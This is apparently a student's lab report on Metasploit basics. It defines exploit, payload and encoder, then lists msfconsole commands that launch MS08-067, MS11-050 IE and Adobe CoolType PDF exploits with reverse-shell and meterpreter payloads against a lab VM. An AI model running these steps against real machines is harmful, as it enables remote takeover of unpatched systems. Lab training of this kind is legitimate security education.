20145225唐振遠《网络对抗》Exp5 MSF基础应用

 

 

基础问题回答

  1. 用自己的话解释什么是exploit,payload,encode
    • exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit的功能就和火箭差不多。
    • payload也就相当于载荷,实际上就是之前我们实验中做到的shellcodeexploit把它传送到靶机中后,它就负责执行相应的攻击代码。
    • encode也就是编码,它主要是为了避免之前的payload中出现坏字符,从而影响payload的功能,其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

实践过程记录

MS08_067漏洞渗透攻击(主动攻击)

  • 使用winXPenSP3为靶机;
  • 首先得确保两台机子在同一网段内
  • 终端中打开msfconsole,输入命令use exploit/windows/smb/ms08_067_netapi,使用MS08_067漏洞模块;
  • 使用命令set payload generic/shell_reverse_tcp指定攻击有效载荷;
  • 设置具体参数:set LHOST Kali的IPset RHOST Windows的IP
  • show options查看所有参数是否设置正确,最后下令发起攻击exploit:

 

 

 

MS11050安全漏洞(IE浏览器渗透攻击)

 

  • 终端中打开msfconsole,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用MS11050漏洞模块;
  • 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
  • 设置具体参数:set LHOST Kali的IPset LPORT 自定义端口号set URIPATH 自定义域名
  • show options查看所有参数是否设置正确,最后下令发起攻击exploit:

  •  

     

Adobe阅读器渗透攻击(针对客户端)

  • 终端中打开msfconsole,输入命令use exploit/windows/fileformat/adobe_cooltype_sing,使用Adobe阅读器漏洞模块;
  • 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
  • 设置具体参数:set FILENAME 自定义文件名.pdfset LHOST Kali的IPset LPORT 自定义端口号
  • show options查看所有参数是否设置正确,最后输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里;

 

 

辅助模块的应用:scanner/http/dir_listing

通过上面三个实验不难看出msf的使用还是有套路可循的:进入模块->指定荷载->设置参数->发动攻击

 

posted on 2017-04-16 23:06  20145225唐振远  阅读(162)  评论(0编辑  收藏  举报

导航